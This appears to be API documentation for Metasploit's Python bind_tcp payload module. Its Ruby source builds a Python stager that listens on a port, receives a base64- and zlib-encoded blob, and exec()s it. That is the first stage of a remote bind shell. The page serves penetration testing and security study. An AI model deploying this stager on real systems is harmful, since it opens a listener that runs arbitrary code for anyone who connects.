Module: Msf::Payload::Python::BindTcp

Includes:
Msf::Payload::Python, SendUUID
Defined in:
lib/msf/core/payload/python/bind_tcp.rb

Overview

Complex bind_tcp payload generation for Python

Instance Method Summary collapse

Methods included from SendUUID

#py_send_uuid

Methods included from Msf::Payload::Python

create_exec_stub, #py_create_exec_stub

Instance Method Details

#generate(_opts = {}) ⇒ Object

Generate the first stage



19
20
21
22
23
24
25
# File 'lib/msf/core/payload/python/bind_tcp.rb', line 19

def generate(_opts = {})
  conf = {
    port: datastore['LPORT']
  }

  generate_bind_tcp(conf)
end

#generate_bind_tcp(opts = {}) ⇒ Object



39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
# File 'lib/msf/core/payload/python/bind_tcp.rb', line 39

def generate_bind_tcp(opts={})
  # Set up the socket
  cmd  = "import zlib,base64,socket,struct\n"
  cmd << "b=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
  cmd << "b.bind(('0.0.0.0',#{opts[:port]}))\n"
  cmd << "b.listen(1)\n"
  cmd << "s,a=b.accept()\n"
  cmd << py_send_uuid if include_send_uuid
  cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
  cmd << "d=s.recv(l)\n"
  cmd << "while len(d)<l:\n"
  cmd << "\td+=s.recv(l-len(d))\n"
  cmd << "exec(zlib.decompress(base64.b64decode(d)),{'s':s})\n"

  py_create_exec_stub(cmd)
end

#handle_intermediate_stage(conn, payload) ⇒ Object



56
57
58
# File 'lib/msf/core/payload/python/bind_tcp.rb', line 56

def handle_intermediate_stage(conn, payload)
  conn.put([payload.length].pack("N"))
end

#include_send_uuidObject

By default, we don't want to send the UUID, but we'll send for certain payloads if requested.



31
32
33
# File 'lib/msf/core/payload/python/bind_tcp.rb', line 31

def include_send_uuid
  false
end

#transport_config(opts = {}) ⇒ Object



35
36
37
# File 'lib/msf/core/payload/python/bind_tcp.rb', line 35

def transport_config(opts={})
  transport_config_bind_tcp(opts)
end